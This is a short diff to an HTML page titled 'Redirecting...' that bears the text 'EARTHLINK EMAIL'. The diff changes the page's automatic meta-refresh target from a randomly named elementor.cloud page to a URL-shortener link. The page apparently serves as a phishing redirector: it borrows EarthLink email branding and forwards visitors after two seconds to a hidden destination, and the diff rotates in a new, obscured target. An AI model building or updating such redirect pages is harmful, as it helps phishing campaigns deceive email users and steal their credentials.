--- a/DE33.html
+++ b/DE33.html
@@ -2,7 +2,7 @@
 <html>
 <head>
 <title>Redirecting...</title>
-<meta http-equiv="refresh" content="2; url = aneblslm.elementor.cloud/elementor-248" />
+<meta http-equiv="refresh" content="2; url = https://u.to/yjNIIg" />
 </head>
 <P>EARTHLINK EMAIL
 <body>
